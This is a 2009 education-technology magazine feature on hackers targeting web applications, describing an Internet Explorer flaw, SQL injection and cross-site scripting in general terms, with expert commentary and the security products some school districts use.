IT Security: Target: The Web


No longer focused on the network, hackers have a bull's eye now trained squarely on web-based applications. What, if anything, can school districts do to thwart them?

Target: The Web

IN DECEMBER, MICROSOFT ANNOUNCED a major security flaw affecting its Internet Explorer web browser. The flaw allowed hackers to use hidden computer code they had already injected into legitimate websites to steal the passwords of visitors to those sites. Reportedly, more than 10,000 websites were infected with the destructive code by the time Microsoft came forward with the news.

The announcement grabbed big headlines, emerging as it did during the Christmas season while unsuspecting online shoppers were clicking away. As Eric Schultze, CTO of Roseville, MN-based patch-management solutions provider Shavlik Technologies, explained it, hackers were exploiting legitimate websites via SQL injection techniques. "This means that visiting supposedly safe websites can lead to compromise via this IE flaw," Schultze said at the time. "Attackers were able to exploit poor SQL coding practices on these 'legit' sites that enable hackers to inject evil code on the websites."

The fix was simple enough, and Microsoft provided a downloadable security patch in record time. Schultze described the company's reaction to the vulnerability as an "all-hands-on-deck response" that was "quite disruptive to its own processes." But the flaw gave critics of the Redmond, WA-based technology empire an excuse to engage in some full-throated Microsoft bashing.

Lost in the hubbub and faultfinding, says web-application security expert Billy Hoffman, was a larger problem.

"These kinds of exploits come and go," Hoffman says. "Next, it'll be a Firefox flaw. A couple of weeks ago it was a problem with QuickTime. At the end of the day, the interesting thing about this IE security issue is that it wasn't about somebody e-mailing you a trojaned WMF image file. Now attackers are setting bear traps on websites."

Hoffman manages HP's Web Security Research Group. Formerly a security researcher for SPI Dynamics (which HP acquired in 2007), he earned hacker street cred during his college days at Georgia Tech when he uncovered a security flaw in the school's magnetic ID card system. He later developed a suite of research tools for capturing, modifying, and validating data from magnetic stripe cards, called Stripe Snoop.

"Bad software is the root of all evil. And it's the true root of most IT security problems."

"Within a day or two, at least 6,000 websites had been hacked," Hoffman says, explaining the lethal swiftness of the IE attack. "That's an extremely fast turnaround time. Hackers were able to act that quickly because these websites had already been compromised. They had exploit kits just sitting there on the web servers, and the attackers just basically updated them to begin serving this IE exploit. It shows how automated these exploits have become." (Exploit kits are software tools that hackers create and use for computer attacks. MPack, IcePack, and Neosploit are among the best known.)

Hoffman sees the speed with which attackers exploited the IE flaw as emblematic of a frightening trend-- one that is colliding with an even scarier one: Hackers are targeting weaknesses in the application layer. And they are not planting the usual viruses or trojans that can be screened out with a firewall, but are revealing an emerging species of attack growing out of the inherent nature of applications that live on the web. "Hackers have compromised hundreds of thousands of legitimate websites through web-app vulnerabilities," Hoffman says, "and they are using those compromised sites to serve malware to visitors."

This is a worrying development for educators who use online educational software and content. What can K-12 technology managers do to cope with this new line of cyber attack?

Controlling the Uncontrollable

"Unfortunately, there's really not much you can do," Hoffman says, "because attackers are starting to target sites you trust. USA Today's website was used to serve malware earlier this year. It's not like you can say, 'Don't visit sites that have URLs ending in .ua for the Ukraine.' You can get hit on legitimate sites."

There may not be much a district can do, but there is something, says Paul Myer, senior vice president of corporate development at Orange, CA-based security solutions provider Marshal8e6. (The company is a merger of the two internet security firms Marshal and 8e6 Technologies, a deal struck last November.)

Web-app vulnerabilities, Myer says, are part of the evolving landscape of threats, and cyber security evolves right along with it. A case in point he cites is Henrico County Public Schools, which found at least part of the answer in a filtering tool it employed to protect students in its 1-to-1 laptop program from inappropriate and malicious web content. In 2001, the Richmond, VA, district began distributing laptops to its teachers, staff, and secondary students. By 2007, the school had gotten laptops into the hands of approximately 27,600 middle and high school students and teachers at 66 schools.

To provide security for the program, and in particular to comply with the Children's Internet Protection Act (CIPA), which mandates that federally funded schools install internet filters to protect students from unsafe online content, the district turned to Marshal8e6. The vendor's Mobile Client program, which Henrico County deployed, is designed to prevent off-site students from accessing inappropriate content (pornography, hate speech, etc.), but also from malicious, web-based code.

"In education you have an interesting confluence of factors," says Myer. "You have curious students with lots of imagination, good equipment at their fingertips, and lots of time on their hands."

"We shouldn't use the developers as the scapegoats. Remember, they’re paid for features and speed, not security."

And they have MySpace, which hit the district's network like what Henrico County Systems Administrator Jason Cope calls an overnight explosion. Through MySpace, students have unlimited access to e-mail, instant messaging, blogs, and photo galleries. "Suddenly, everyone was trying to use [MySpace], and there was a plethora of hits to multiple points of entry for the site," Cope says.

The increased traffic degraded the district's internet access to educational applications and increased its exposure to malicious code. Henrico County eventually turned to another Marshal8e6 product, the R3000 internet filter. The standalone filtering appliance utilizes a pattern-detection capability to sort out and block three types of web applications: streaming media applications, remote access control applications, and online games.

The same strategy lies at the heart of San Ramon, CA-based Faronics' literally named filtering tool, Anti-Executable, designed specifically to shield school computers from malicious executable code. The product works from a white list, a roster of authorized programs that district tech managers and IT administrators control.

"If an executable shows up and it's not on the white list, the product keeps that code from running," explains company spokesperson Dheeraj Mahtani. "We think this approach is especially useful in K-12 environments. It ensures that students have access to the productive programs they need while preventing anything that's unwanted in the classroom from running."

Along with Anti-Executable, Faronics offers a product called Deep Freeze that allows users what you might call a do-over in the event of a strike from hackers. Upper Dauphin Area School District uses both tools to secure its students' computers.

The district comprises an elementary, middle, and high school located in Elizabethville, PA. It supports 500-plus student and teacher workstations running Microsoft Windows XP, and 19 servers. Tainted software had become an especially serious problem in the high school computing labs, according to district Technology Director Bryan Campbell. The advanced computing abilities of some ill-intentioned students allowed them to create larger workstation disruptions, Campbell says. The district's effort to "bring control to an uncontrolled environment," as he terms it, was straining its IT resources. Software that restricts what users can do and access did help the district prevent several forms of system damage-- for a while. But Campbell says this approach was difficult and time-consuming, and at the end of the day, the students were just too adept at circumventing it.

Deep Freeze is a reboot-to-restore tool that takes a snapshot of the computer and "freezes" it into a protected state. Any changes made to that snapshot can be undone by the program and the computer returned to that original frozen state.

"It's just a fact that computers in education environments are among the toughest to manage and secure," Mahtani says. "Lots of different daily users and limited on-site staff support for what are often large numbers of machines create a kind of IT perfect storm. Deep Freeze allows administrators to set up a machine and walk away. The protection takes place on the restart."

Are Programmers to Blame?

The rise of web apps as the No. 1 avenue of malicious hacker attack is old news to Gary McGraw, who has been preaching application security for years. He's the author or co-author of six bestselling books on the subject, including the now-classic Exploiting Software: How to Break Code (Addison-Wesley Professional, 2004), which he wrote with Greg Hoglund, the founder of, a clearinghouse of information about rootkits and anti-rootkits. His latest book, also written with Hoglund, is Exploiting Online Games: Cheating Massively Distributed Systems (Addison-Wesley Professional, 2007). McGraw is also the CTO of Cigital, a Dulles, VA-based provider of software quality and security solutions.

Why Web Apps Are So Vulnerable

Target: The WebWEB APPLICATIONS HAVE BECOME RIPE for attack thanks in part, some computer security experts say, to the enormous popularity of a development technique known as Ajax, which utilizes the JavaScript dynamic scripting language.

Ajax creates highly interactive web pages through the combination of several technologies in addition to JavaScript, including XML and HTML.

And therein lies the problem, says security expert Brian Chess.

"JavaScript is very hard to secure, and nowadays it's everywhere on the web," he says. "And the fact that Ajax proponents are not acknowledging the problem isn't making it any easier.We need to stop teaching people to make use of these new web technologies while pretending that there are no security considerations.With new technologies comes a new set of threats."

Veritable throngs of web-app developers are now using Ajax to improve the responsiveness of web pages by automating the exchange of information between browsers and servers. The result has been a greatly improved user experience-- and an unexpected vulnerability. In 2006, attackers began using JavaScript to exploit cross-site scripting (XSS) vulnerabilities in dynamic websites. In an XSS attack, a web application is used to send malicious script to an unsuspecting end user through his browser. Because the user's browser has no way of knowing that the code did not come from a trusted source, it runs it, giving the attacker access to cookies, session tokens, and other sensitive information. What's the consequence for the website visitor? Theft of data, mainly. And there will be no hint of trouble, so he won't know he's been compromised.

According to Wikipedia, as of 2007, cross-site scripting carried out on websites made up about 80 percent of all documented security vulnerabilities.

"Bad software is the root of all evil," McGraw says. "And it's the true root of most IT security problems." These days, he explains, the black hats aren't getting at you by breaching some network security mechanism, but by leveraging the functionality of an application.

"For many years, security was about operations-- about infrastructure and the people who keep the network going," McGraw says. "Today the problem is about the vulnerable software the operations managers have to deal with. They get this broken stuff, and they know it's broken, but they don't know how to fix it because they're not software guys, so they just put something around it, like an application firewall, or maybe they poke it a couple times to see how broken it really is with some black-box testing tools. Unfortunately, operations cannot solve this problem. The only people who can solve it are the software builders of the world."

Brian Chess, chief scientist and co-founder of Fortify Software, a Palo Alto, CA-based provider of enterprise application security solutions, agrees. "Whether they know it or not, computer security is largely in the hands of programmers," he says. Chess is the co-author of Secure Programming With Static Analysis (Addison-Wesley Professional, 2007), which he wrote with Jacob West, and his work at the University of California- Santa Cruz led to the development of Eau Claire, a framework for detecting and eliminating security vulnerabilities in software.

"One of our problems with security these days is that it's just too darned hard," Chess says. "It's very difficult to write a program that's secure. We're all about helping developers get it right the first time, but it's a big challenge for everyone. If there were some easy, take-a-pill kind of solution to the software security problem, you'd better believe everyone would be doing it."

Many application-layer attacks are aimed at certain well known but unfortunately still common types of coding errors pertaining to the way web applications process input from website visitors, HP's Hoffman explains. "A simple e-commerce application typically asks users for various kinds of information-- passwords, addresses, etc.-- and without the appropriate safeguards, hackers can try to use those input fields to pass malicious instructions to the host computer."

In their latest quarterly report, security analysts at Santa Clara, CA-based Cenzic Intelligent Analysis Lab stated that SQL injection (34 percent) and cross-site scripting (23 percent) are the two most common ways hackers poison web-based applications with malicious code. The study also found that vulnerabilities in media players are causing a widening security hole that school districts need to be aware of, given the role that media players have in presenting online educational content. These programs account for between 2 and 5 percent of the total web-application vulnerability volume during any given quarter, Cenzic reports. Seven percent of those vulnerabilities pertain to web servers, and 4 percent to web browsers. And it wasn't Internet Explorer that was the most at risk, but Mozilla's Firefox browser, which had the most vulnerabilities by far at 41 percent. The Opera browser was second at 26 percent. IE accounted for just 17 percent of the vulnerabilities. Apple's Safari browser had the lowest number of reported vulnerabilities at 16 percent.

Security consultant and trainer Dinis Cruz recognizes the soft spot in the application layer, but he stops short of putting the onus on the developers. Cruz, who specializes in web application security, is the chief security evangelist of the Open Web Application Security Project, an open web-based community focused on finding and fighting the causes of insecure software.

"We're in the process of building a world in which all the code we run on our websites has the power to access all of our assets from our desktops and servers," Cruz says. "From a security point of view, this is a very bad development. But we shouldn't use the developers as the scapegoats. They often simply don't have enough visibility into what they are creating to evaluate the security of an application. And remember, they're paid for features and speed, not security."

"I don't want to blame the developers either," Chess adds. "There isn't a great roadmap through Web 2.0 territory, so there's this temptation to pretend that you can take care of the security part later. But if there's one thing history tells us, it's that that kind of thinking can really get us into trouble."

Cruz is especially worried about the new web-app frameworks-- such as Adobe's AIR (Adobe Integrated Runtime), Sun's JavaFX, and Microsoft's Silverlight. "The feeling now is, hey, the new paradigm is just the desktop application," he says. "The user installs it and clicks yes, so the vendor is covered, but then those things have access to all the user's resources."

"Ultimately, it's the developer who has to fix this," HP's Hoffman says. "The IT security guys are doing their job. They set up firewall rules, secure the perimeter, and implement anti-spam and antivirus protection. But they're just securing the infrastructure that's serving you an application. If that application is broken, old, or insecure in some way, there's no magical box that your IT guy can [install] to protect you.

"This is the world we now live in," Hoffman goes on. "Attackers are using web-app vulnerabilities to compromise sites, and then use those sites to lay land mines or bear traps to nail unsuspecting people coming by. There's always going to be this game of Whack-a-Mole around IE exploits-- or QuickTime or Firefox or Flash. But if we can secure these applications-- these online services that everyone uses and trusts-- there won't be any platforms for people to get attacked from."

If you would like more information on IT security, visit our website at In the Browse by Topic menu, click on Security/Privacy.

John K. Waters is a freelance writer based in Palo Alto, CA.

This article originally appeared in the 02/01/2009 issue of THE Journal.